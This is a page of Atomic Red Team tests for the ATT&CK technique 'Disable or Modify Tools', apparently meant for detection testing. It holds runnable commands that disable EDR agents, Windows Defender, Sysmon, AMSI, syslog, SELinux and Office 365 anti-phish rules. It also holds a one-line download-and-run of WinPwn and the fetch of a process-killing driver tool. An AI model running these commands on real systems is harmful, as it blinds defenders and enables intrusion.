logo
SlackReddit

T1685

Disable or Modify Tools

Description from ATT&CK

Adversaries may disable, degrade, or tamper with security tools or applications (e.g., endpoint detection and response (EDR) tools, intrusion detection systems (IDS), antivirus, logging agents, sensors, etc.) to impair or reduce visibility of defensive capabilities. This may include stopping specific services, killing processes, modifying or deleting tool configuration files and Registry keys, or preventing tools from updating. This may also include impairing defenses more broadly by disrupting preventative, detection, and response mechanisms across host, network, and cloud environments.(Citation: SCADAfence_ransomware)

In addition to directly targeting tools, adversaries may block or manipulate indicators and telemetry used for detection. This includes maliciously disabling or redirecting sensors such as Event Tracing for Windows (ETW), modifying event log configurations (e.g., redirecting Security logs), or interfering with logging pipelines and forwarding mechanisms (e.g., SIEM ingestion).(Citation: Microsoft Lamin Sept 2017)(Citation: ETW Palantir)

More advanced techniques include leveraging legitimate drivers or debugging mechanisms to render tools non-functional, bypassing anti-tampering protections, and targeting specific defenses such as Sysmon or cloud monitoring agents. Adversaries may also disrupt broader defensive operations, including update mechanisms, logging infrastructure (e.g., syslog), or event aggregation, further degrading an organization’s ability to detect and respond to malicious activity.(Citation: Cocomazzi FIN7 Reboot)

Source

Atomic Tests

Atomic Test #1: Windows Disable LSA Protection

The following Atomic adds a registry entry to disable LSA Protection.

The LSA controls and manages user rights information, password hashes and other important bits of information in memory. Attacker tools, such as mimikatz, rely on accessing this content to scrape password hashes or clear-text passwords. Enabling LSA Protection configures Windows to control the information stored in memory in a more secure fashion - specifically, to prevent non-protected processes from accessing that data. Upon successful execution, the registry will be modified and RunAsPPL will be set to 0, disabling Lsass protection. https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection#how-to-disable-lsa-protection https://blog.netwrix.com/2022/01/11/understanding-lsa-protection/ https://thedfirreport.com/2022/03/21/phosphorus-automates-initial-access-using-proxyshell/

Supported Platforms: Windows

auto_generated_guid: 40075d5f-3a70-4c66-9125-f72bee87247d

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

reg add HKLM\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /t REG_DWORD /d 0 /f

Cleanup Commands

reg delete HKLM\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /f >nul 2>&1

Atomic Test #2: Disable journal logging via systemctl utility

The atomic test disables the journal logging using built-in systemctl utility

Supported Platforms: Linux

auto_generated_guid: c3a377f9-1203-4454-aa35-9d391d34768f

Attack Commands: Run with sh! Elevation Required (e.g. root or admin)

sudo systemctl stop systemd-journald #disables journal logging

Cleanup Commands

sudo systemctl start systemd-journald #starts journal service
sudo systemctl enable systemd-journald #starts journal service automatically at boot time

Atomic Test #3: Disable journal logging via sed utility

The atomic test disables the journal logging by searching and replacing the "Storage" parameter to "none" within the journald.conf file, thus any new journal entries will only be temporarily available in memory and not written to disk

Supported Platforms: Linux

auto_generated_guid: 12e5551c-8d5c-408e-b3e4-63f53b03379f

Attack Commands: Run with sh! Elevation Required (e.g. root or admin)

sudo sed -i 's/Storage=auto/Storage=none/' /etc/systemd/journald.conf

Cleanup Commands

sudo sed -i 's/Storage=none/Storage=auto/' /etc/systemd/journald.conf #re-enables storage of journal data
sudo systemctl restart systemd-journald #restart the journal service

Atomic Test #4: Disable syslog

Disables syslog collection

Supported Platforms: Linux

auto_generated_guid: 4ce786f8-e601-44b5-bfae-9ebb15a7d1c8

Inputs

NameDescriptionTypeDefault Value
package_checkerPackage checking command for linux.string(rpm -q rsyslog 2>&1 >/dev/null)
package_installerPackage installer command for linux. Default yumstring(which yum && yum -y install epel-release rsyslog)
flavor_commandCommand to disable syslog collection. Default newer rsyslog commands. i.e older command = service rsyslog stop ; chkconfig off rsyslogstringsystemctl stop rsyslog ; systemctl disable rsyslog
cleanup_commandCommand to enable syslog collection. Default newer rsyslog commands. i.e older command = service rsyslog start ; chkconfig rsyslog onstringsystemctl start rsyslog ; systemctl enable rsyslog

Attack Commands: Run with sh! Elevation Required (e.g. root or admin)

#{flavor_command}

Cleanup Commands

#{cleanup_command}

Dependencies: Run with sh!

Description: Package with rsyslog must be on system
Check Prereq Commands
if #{package_checker} > /dev/null; then exit 0; else exit 1; fi
Get Prereq Commands
sudo #{package_installer}

Atomic Test #5: Disable syslog (freebsd)

Disables syslog collection

Supported Platforms: Linux

auto_generated_guid: db9de996-441e-4ae0-947b-61b6871e2fdf

Attack Commands: Run with sh! Elevation Required (e.g. root or admin)

service syslogd stop
sysrc syslogd_enable="NO"

Cleanup Commands

sysrc syslogd_enable="YES"
service syslogd start

Atomic Test #6: Disable Cb Response

Disable the Cb Response service

Supported Platforms: Linux

auto_generated_guid: ae8943f7-0f8d-44de-962d-fbc2e2f03eb8

Attack Commands: Run with sh!

if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ];
then
  service cbdaemon stop
  chkconfig off cbdaemon
else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "7" ];
  systemctl stop cbdaemon
  systemctl disable cbdaemon
fi

Atomic Test #7: Disable SELinux

Disables SELinux enforcement

Supported Platforms: Linux

auto_generated_guid: fc225f36-9279-4c39-b3f9-5141ab74f8d8

Attack Commands: Run with sh! Elevation Required (e.g. root or admin)

setenforce 0

Cleanup Commands

setenforce 1

Dependencies: Run with sh!

Description: SELinux must be installed
Check Prereq Commands
which setenforce
Get Prereq Commands
echo "SELinux is not installed"; exit 1

Atomic Test #8: Stop Crowdstrike Falcon on Linux

Stop and disable Crowdstrike Falcon on Linux

Supported Platforms: Linux

auto_generated_guid: 828a1278-81cc-4802-96ab-188bf29ca77d

Attack Commands: Run with sh! Elevation Required (e.g. root or admin)

sudo systemctl stop falcon-sensor.service
sudo systemctl disable falcon-sensor.service

Cleanup Commands

sudo systemctl enable falcon-sensor.service
sudo systemctl start falcon-sensor.service

Atomic Test #9: Disable Carbon Black Response

Disables Carbon Black Response

Supported Platforms: macOS

auto_generated_guid: 8fba7766-2d11-4b4a-979a-1e3d9cc9a88c

Attack Commands: Run with sh! Elevation Required (e.g. root or admin)

sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.daemon.plist
sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.defense.daemon.plist

Cleanup Commands

sudo launchctl load -w /Library/LaunchDaemons/com.carbonblack.daemon.plist
sudo launchctl load -w /Library/LaunchDaemons/com.carbonblack.defense.daemon.plist

Atomic Test #10: Disable LittleSnitch

Disables LittleSnitch

Supported Platforms: macOS

auto_generated_guid: 62155dd8-bb3d-4f32-b31c-6532ff3ac6a3

Attack Commands: Run with sh! Elevation Required (e.g. root or admin)

sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist

Cleanup Commands

sudo launchctl load -w /Library/LaunchDaemons/at.obdev.littlesnitchd.plist

Atomic Test #11: Disable OpenDNS Umbrella

Disables OpenDNS Umbrella

Supported Platforms: macOS

auto_generated_guid: 07f43b33-1e15-4e99-be70-bc094157c849

Attack Commands: Run with sh! Elevation Required (e.g. root or admin)

sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist

Cleanup Commands

sudo launchctl load -w /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist

Atomic Test #12: Disable macOS Gatekeeper

Disables macOS Gatekeeper

Supported Platforms: macOS

auto_generated_guid: 2a821573-fb3f-4e71-92c3-daac7432f053

Attack Commands: Run with sh! Elevation Required (e.g. root or admin)

sudo spctl --master-disable

Cleanup Commands

sudo spctl --master-enable

Atomic Test #13: Stop and unload Crowdstrike Falcon on macOS

Stop and unload Crowdstrike Falcon daemons falcond and userdaemon on macOS

Supported Platforms: macOS

auto_generated_guid: b3e7510c-2d4c-4249-a33f-591a2bc83eef

Inputs

NameDescriptionTypeDefault Value
falcond_plistThe path of the Crowdstrike Falcon plist filepath/Library/LaunchDaemons/com.crowdstrike.falcond.plist
userdaemon_plistThe path of the Crowdstrike Userdaemon plist filepath/Library/LaunchDaemons/com.crowdstrike.userdaemon.plist

Attack Commands: Run with sh! Elevation Required (e.g. root or admin)

sudo launchctl unload #{falcond_plist}
sudo launchctl unload #{userdaemon_plist}

Cleanup Commands

sudo launchctl load -w #{falcond_plist}
sudo launchctl load -w #{userdaemon_plist}

Atomic Test #14: Unload Sysmon Filter Driver

Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service. To verify successful execution, run the prereq_command's and it should fail with an error of "sysmon filter must be loaded".

Supported Platforms: Windows

auto_generated_guid: 811b3e76-c41b-430c-ac0d-e2380bfaa164

Inputs

NameDescriptionTypeDefault Value
sysmon_driverThe name of the Sysmon filter driver (this can change from the default)stringSysmonDrv

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

fltmc.exe unload #{sysmon_driver}

Cleanup Commands

sysmon -u -i > nul 2>&1
sysmon -i -accepteula -i > nul 2>&1
"PathToAtomicsFolder\..\ExternalPayloads\Sysmon\Sysmon.exe" -u > nul 2>&1
"PathToAtomicsFolder\..\ExternalPayloads\Sysmon\Sysmon.exe" -accepteula -i > nul 2>&1

Dependencies: Run with powershell!

Description: Sysmon must be downloaded
Check Prereq Commands
if ((cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr /i Sysmon 2> nul") -or (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\Sysmon\Sysmon.exe")) { exit 0 } else { exit 1 }
Get Prereq Commands
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/Sysmon.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\Sysmon.zip"
Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\Sysmon.zip" "PathToAtomicsFolder\..\ExternalPayloads\Sysmon" -Force
Description: sysmon must be Installed
Check Prereq Commands
if(sc.exe query sysmon | findstr sysmon) { exit 0 } else { exit 1 }
Get Prereq Commands
if(cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") { C:\Windows\Sysmon.exe -accepteula -i } else
{ & "PathToAtomicsFolder\..\ExternalPayloads\Sysmon\Sysmon.exe" -accepteula -i}
Description: sysmon filter must be loaded
Check Prereq Commands
if(fltmc.exe filters | findstr #{sysmon_driver}) { exit 0 } else { exit 1 }
Get Prereq Commands
if(Test-Path "PathToAtomicsFolder\..\ExternalPayloads\Sysmon\Sysmon.exe"){
  & "PathToAtomicsFolder\..\ExternalPayloads\Sysmon\Sysmon.exe" -u
  & "PathToAtomicsFolder\..\ExternalPayloads\Sysmon\Sysmon.exe" -accepteula -i
}else{
  sysmon -u
  sysmon -accepteula -i
}

Atomic Test #15: Uninstall Sysmon

Uninstall Sysinternals Sysmon for Defense Evasion

Supported Platforms: Windows

auto_generated_guid: a316fb2e-5344-470d-91c1-23e15c374edc

Inputs

NameDescriptionTypeDefault Value
sysmon_exeThe location of the Sysmon executable from Sysinternals (ignored if sysmon.exe is found in your PATH)pathPathToAtomicsFolder\T1685\bin\sysmon.exe

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

sysmon -u

Cleanup Commands

sysmon -i -accepteula >nul 2>&1

Dependencies: Run with powershell!

Description: Sysmon executable must be available
Check Prereq Commands
if(cmd /c where sysmon) {exit 0} else {exit 1}
Get Prereq Commands
$parentpath = Split-Path "#{sysmon_exe}"; $zippath = "$parentpath\Sysmon.zip"
New-Item -ItemType Directory $parentpath -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/Sysmon.zip" -OutFile "$zippath"
Expand-Archive $zippath $parentpath -Force; Remove-Item $zippath
if(-not ($Env:Path).contains($parentpath)){$Env:Path += ";$parentpath"}
Description: Sysmon must be installed
Check Prereq Commands
if(cmd /c sc query sysmon) { exit 0} else { exit 1}
Get Prereq Commands
cmd /c sysmon -i -accepteula

Atomic Test #16: AMSI Bypass - AMSI InitFailed

Any easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true. Upon execution, no output is displayed.

https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/

Supported Platforms: Windows

auto_generated_guid: 695eed40-e949-40e5-b306-b4031e4154bd

Attack Commands: Run with powershell!

[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

Cleanup Commands

[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$false)

Atomic Test #17: AMSI Bypass - Remove AMSI Provider Reg Key

With administrative rights, an adversary can remove the AMSI Provider registry key in HKLM\Software\Microsoft\AMSI to disable AMSI inspection. This test removes the Windows Defender provider registry key. Upon execution, no output is displayed. Open Registry Editor and navigate to "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" to verify that it is gone.

Supported Platforms: Windows

auto_generated_guid: 13f09b91-c953-438e-845b-b585e51cac9b

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse

Cleanup Commands

New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}" -ErrorAction Ignore | Out-Null

Atomic Test #18: Disable Arbitrary Security Windows Service

With administrative rights, an adversary can disable Windows Services related to security products. This test requires McAfeeDLPAgentService to be installed. Change the service_name input argument for your AV solution. Upon exeuction, infomration will be displayed stating the status of the service. To verify that the service has stopped, run "sc query McAfeeDLPAgentService"

Supported Platforms: Windows

auto_generated_guid: a1230893-56ac-4c81-b644-2108e982f8f5

Inputs

NameDescriptionTypeDefault Value
service_nameThe name of the service to stopstringMcAfeeDLPAgentService

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

net.exe stop #{service_name}
sc.exe config #{service_name} start= disabled

Cleanup Commands

sc.exe config #{service_name} start= auto >nul 2>&1
net.exe start #{service_name} >nul 2>&1

Atomic Test #19: Tamper with Windows Defender ATP PowerShell

Attempting to disable scheduled scanning and other parts of windows defender atp. Upon execution Virus and Threat Protection will show as disabled in Windows settings.

Supported Platforms: Windows

auto_generated_guid: 6b8df440-51ec-4d53-bf83-899591c9b5d7

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

Set-MpPreference -DisableRealtimeMonitoring 1
Set-MpPreference -DisableBehaviorMonitoring 1
Set-MpPreference -DisableScriptScanning 1
Set-MpPreference -DisableBlockAtFirstSeen 1

Cleanup Commands

Set-MpPreference -DisableRealtimeMonitoring 0
Set-MpPreference -DisableBehaviorMonitoring 0
Set-MpPreference -DisableScriptScanning 0
Set-MpPreference -DisableBlockAtFirstSeen 0

Atomic Test #20: Tamper with Windows Defender Command Prompt

Attempting to disable scheduled scanning and other parts of windows defender atp. These commands must be run as System, so they still fail as administrator. However, adversaries do attempt to perform this action so monitoring for these command lines can help alert to other bad things going on. Upon execution, "Access Denied" will be displayed twice and the WinDefend service status will be displayed.

Supported Platforms: Windows

auto_generated_guid: aa875ed4-8935-47e2-b2c5-6ec00ab220d2

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

sc stop WinDefend
sc config WinDefend start=disabled
sc query WinDefend

Cleanup Commands

sc start WinDefend >nul 2>&1
sc config WinDefend start=enabled >nul 2>&1

Atomic Test #21: Tamper with Windows Defender Registry

Disable Windows Defender from starting after a reboot. Upen execution, if the computer is rebooted the entire Virus and Threat protection window in Settings will be grayed out and have no info.

Supported Platforms: Windows

auto_generated_guid: 1b3e0146-a1e5-4c5c-89fb-1bb2ffe8fc45

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1

Cleanup Commands

Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 0

Atomic Test #22: Disable Microsoft Office Security Features

Gorgon group may disable Office security features so that their code can run. Upon execution, an external document will not show any warning before editing the document.

https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/

Supported Platforms: Windows

auto_generated_guid: 6f5fb61b-4e56-4a3d-a8c3-82e13686c6d7

Attack Commands: Run with powershell!

New-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel"
New-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security"
New-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView"
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security" -Name "VBAWarnings" -Value "1" -PropertyType "Dword"
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -Name "DisableInternetFilesInPV" -Value "1" -PropertyType "Dword"
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -Name "DisableUnsafeLocationsInPV" -Value "1" -PropertyType "Dword"
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -Name "DisableAttachementsInPV" -Value "1" -PropertyType "Dword"

Cleanup Commands

Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security" -Name "VBAWarnings" -ErrorAction Ignore | Out-Null
Remove-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -ErrorAction Ignore

Atomic Test #23: Remove Windows Defender Definition Files

Removing definition files would cause ATP to not fire for AntiMalware. Check MpCmdRun.exe man page for info on all arguments. On later viersions of windows (1909+) this command fails even with admin due to inusfficient privelages. On older versions of windows the command will say completed.

https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/

Supported Platforms: Windows

auto_generated_guid: 3d47daaa-2f56-43e0-94cc-caf5d8d52a68

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

Atomic Test #24: Stop and Remove Arbitrary Security Windows Service

Beginning with Powershell 6.0, the Stop-Service cmdlet sends a stop message to the Windows Service Controller for each of the specified services. The Remove-Service cmdlet removes a Windows service in the registry and in the service database.

Supported Platforms: Windows

auto_generated_guid: ae753dda-0f15-4af6-a168-b9ba16143143

Inputs

NameDescriptionTypeDefault Value
service_nameThe name of the service to removestringMcAfeeDLPAgentService

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

Stop-Service -Name #{service_name}
Remove-Service -Name #{service_name}

Atomic Test #25: Uninstall Crowdstrike Falcon on Windows

Uninstall Crowdstrike Falcon. If the WindowsSensor.exe path is not provided as an argument we need to search for it. Since the executable is located in a folder named with a random guid we need to identify it before invoking the uninstaller.

Supported Platforms: Windows

auto_generated_guid: b32b1ccf-f7c1-49bc-9ddd-7d7466a7b297

Inputs

NameDescriptionTypeDefault Value
falcond_pathThe Crowdstrike Windows Sensor path. The Guid always changes.pathC:\ProgramData\Package Cache\{7489ba93-b668-447f-8401-7e57a6fe538d}\WindowsSensor.exe

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

if (Test-Path "#{falcond_path}") {. "#{falcond_path}" /repair /uninstall /quiet } else { Get-ChildItem -Path "C:\ProgramData\Package Cache" -Include "WindowsSensor.exe" -Recurse | % { $sig=$(Get-AuthenticodeSignature -FilePath $_.FullName); if ($sig.Status -eq "Valid" -and $sig.SignerCertificate.DnsNameList -eq "CrowdStrike, Inc.") { . "$_" /repair /uninstall /quiet; break;}}}

Atomic Test #26: Tamper with Windows Defender Evade Scanning -Folder

Malware can exclude a specific path from being scanned and evading detection. Upon successul execution, the file provided should be on the list of excluded path. To check the exclusion list using poweshell (Get-MpPreference).ExclusionPath

Supported Platforms: Windows

auto_generated_guid: 0b19f4ee-de90-4059-88cb-63c800c683ed

Inputs

NameDescriptionTypeDefault Value
excluded_folderThis folder will be excluded from scanningpathC:\Temp

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

$excludedpath= "#{excluded_folder}"
Add-MpPreference -ExclusionPath $excludedpath

Cleanup Commands

$excludedpath= "#{excluded_folder}"
Remove-MpPreference -ExclusionPath $excludedpath

Atomic Test #27: Tamper with Windows Defender Evade Scanning -Extension

Malware can exclude specific extensions from being scanned and evading detection. Upon successful execution, the extension(s) should be on the list of excluded extensions. To check the exclusion list using poweshell (Get-MpPreference).ExclusionExtension.

Supported Platforms: Windows

auto_generated_guid: 315f4be6-2240-4552-b3e1-d1047f5eecea

Inputs

NameDescriptionTypeDefault Value
excluded_extsA list of extension to exclude from scanningstring.exe

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

$excludedExts= "#{excluded_exts}"
Add-MpPreference -ExclusionExtension  $excludedExts

Cleanup Commands

$excludedExts= "#{excluded_exts}"
Remove-MpPreference -ExclusionExtension  $excludedExts -ErrorAction Ignore

Atomic Test #28: Tamper with Windows Defender Evade Scanning -Process

Malware can exclude specific processes from being scanned and evading detection. Upon successful execution, the process(es) should be on the list of excluded processes. To check the exclusion list using poweshell (Get-MpPreference).ExclusionProcess."

Supported Platforms: Windows

auto_generated_guid: a123ce6a-3916-45d6-ba9c-7d4081315c27

Inputs

NameDescriptionTypeDefault Value
excluded_processA list of processes to exclude from scanningstringoutlook.exe

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

$excludedProcess = "#{excluded_process}"
Add-MpPreference -ExclusionProcess $excludedProcess

Cleanup Commands

$excludedProcess = "#{excluded_process}"
Remove-MpPreference -ExclusionProcess  $excludedProcess

Atomic Test #29: office-365-Disable-AntiPhishRule

Using the Disable-AntiPhishRule cmdlet to disable antiphish rules in your office-365 organization.

Supported Platforms: Office-365

auto_generated_guid: b9bbae2c-2ba6-4cf3-b452-8e8f908696f3

Inputs

NameDescriptionTypeDefault Value
usernameoffice-365 usernamestring
passwordoffice-365 passwordstring

Attack Commands: Run with powershell!

$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
Connect-ExchangeOnline -Credential $creds
$test = Get-AntiPhishRule
Disable-AntiPhishRule -Identity $test.Name -Confirm:$false
Get-AntiPhishRule

Cleanup Commands

if("#{password}" -ne "") {
$secure_pwd = ("#{password}" + "") | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
Connect-ExchangeOnline -Credential $creds
$test = Get-AntiPhishRule
Enable-AntiPhishRule -Identity $test.Name -Confirm:$false
Get-AntiPhishRule
}

Dependencies: Run with powershell!

Description: ExchangeOnlineManagement PowerShell module must be installed
Check Prereq Commands
$RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Connect-ExchangeOnline']) {exit 1} else {exit 0}
Get Prereq Commands
Install-Module -Name ExchangeOnlineManagement
Import-Module ExchangeOnlineManagement

Atomic Test #30: Disable Windows Defender with DISM

The following Atomic will attempt to disable Windows-Defender using the built in DISM.exe, Deployment Image Servicing and Management tool. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images. A successful execution will not standard-out any details. Remove the quiet switch if verbosity is needed. This method will remove Defender and it's package.

Supported Platforms: Windows

auto_generated_guid: 871438ac-7d6e-432a-b27d-3e7db69faf58

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet

Atomic Test #31: Disable Defender Using NirSoft AdvancedRun

Information on NirSoft AdvancedRun and its creators found here: http://www.nirsoft.net/utils/advanced_run.html This Atomic will run AdvancedRun.exe with similar behavior identified during the WhisperGate campaign. See https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3 Upon successful execution, AdvancedRun.exe will attempt to run and stop Defender, and optionally attempt to delete the Defender folder on disk.

Supported Platforms: Windows

auto_generated_guid: 81ce22fd-9612-4154-918e-8a1f285d214d

Inputs

NameDescriptionTypeDefault Value
AdvancedRun_LocationPath of Advanced Run executablepathPathToAtomicsFolder\..\ExternalPayloads\AdvancedRun.exe
delete_defender_folderSet to 1 to also delete the Windows Defender folderinteger0

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

Try {cmd /c "#{AdvancedRun_Location}" /EXEFilename "$env:systemroot\System32\sc.exe" /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory "" /RunAs 8 /Run} Catch{}
if(#{delete_defender_folder}){
  $CommandToRun = rmdir "$env:programdata\Microsoft\Windows Defender" -Recurse
  Try {cmd /c "#{AdvancedRun_Location}" /EXEFilename "$env:systemroot\System32\WindowsPowershell\v1.0\powershell.exe" /WindowState 0 /CommandLine "$CommandToRun" /StartDirectory "" /RunAs 8 /Run} Catch{}
}

Cleanup Commands

Try {cmd /c "#{AdvancedRun_Location}" /EXEFilename "$env:systemroot\System32\sc.exe" /WindowState 0 /CommandLine "start WinDefend" /StartDirectory "" /RunAs 8 /Run} Catch{}

Dependencies: Run with powershell!

Description: Advancedrun.exe must exist at #{AdvancedRun_Location}
Check Prereq Commands
if(Test-Path -Path "#{AdvancedRun_Location}") {exit 0} else {exit 1}
Get Prereq Commands
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "http://www.nirsoft.net/utils/advancedrun.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\advancedrun.zip"
Expand-Archive -path "PathToAtomicsFolder\..\ExternalPayloads\advancedrun.zip" -destinationpath "PathToAtomicsFolder\..\ExternalPayloads\" -Force

Atomic Test #32: Kill antimalware protected processes using Backstab

Backstab loads Process Explorer driver which is signed by Microsoft and use it to terminate running processes protected by antimalware software such as MsSense.exe or MsMpEng.exe, which is otherwise not possible to kill. https://github.com/Yaxser/Backstab

Supported Platforms: Windows

auto_generated_guid: 24a12b91-05a7-4deb-8d7f-035fa98591bc

Inputs

NameDescriptionTypeDefault Value
process_nameName of the protected process you want to kill/terminate.stringMsMpEng.exe

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

& "PathToAtomicsFolder\..\ExternalPayloads\Backstab64.exe" -k -n #{process_name}

Dependencies: Run with powershell!

Description: Backstab64.exe should exist in ExtrnalPayloads Directory
Check Prereq Commands
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\Backstab64.exe") {exit 0} else {exit 1}
Get Prereq Commands
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://github.com/Yaxser/Backstab/releases/download/v1.0.1-beta/Backstab64.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\Backstab64.exe"

Atomic Test #33: WinPwn - Kill the event log services for stealth

Kill the event log services for stealth via function of WinPwn

Supported Platforms: Windows

auto_generated_guid: 7869d7a3-3a30-4d2c-a5d2-f1cd9c34ce66

Attack Commands: Run with powershell!

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
inv-phantom -consoleoutput -noninteractive

Atomic Test #34: Tamper with Windows Defender ATP using Aliases - PowerShell

Attempting to disable scheduled scanning and other parts of Windows Defender ATP using set-MpPreference aliases. Upon execution Virus and Threat Protection will show as disabled in Windows settings.

Supported Platforms: Windows

auto_generated_guid: c531aa6e-9c97-4b29-afee-9b7be6fc8a64

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

Set-MpPreference -drtm $True
Set-MpPreference -dbm $True
Set-MpPreference -dscrptsc $True
Set-MpPreference -dbaf $True

Cleanup Commands

Set-MpPreference -drtm 0
Set-MpPreference -dbm 0
Set-MpPreference -dscrptsc 0
Set-MpPreference -dbaf 0

Atomic Test #35: LockBit Black - Disable Privacy Settings Experience Using Registry -cmd

LockBit Black - Disable Privacy Settings Experience Using Registry

Supported Platforms: Windows

auto_generated_guid: d6d22332-d07d-498f-aea0-6139ecb7850e

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

reg add "HKCU\Software\Policies\Microsoft\Windows\OOBE" /v DisablePrivacyExperience /t REG_DWORD /d 1 /f

Cleanup Commands

reg delete "HKCU\Software\Policies\Microsoft\Windows\OOBE" /v DisablePrivacyExperience /f >nul 2>&1

Atomic Test #36: LockBit Black - Use Registry Editor to turn on automatic logon -cmd

LockBit Black - Use Registry Editor to turn on automatic logon

Supported Platforms: Windows

auto_generated_guid: 9719d0e1-4fe0-4b2e-9a72-7ad3ee8ddc70

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

reg add "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon /t REG_DWORD /d 1 /f
reg add "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName /t REG_SZ /d Administrator /f
reg add "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultDomainName /t REG_SZ /d contoso.com /f
reg add "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword /t REG_SZ /d password1 /f

Cleanup Commands

reg delete "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon /f >nul 2>&1
reg delete "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName /f >nul 2>&1
reg delete "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultDomainName /f >nul 2>&1
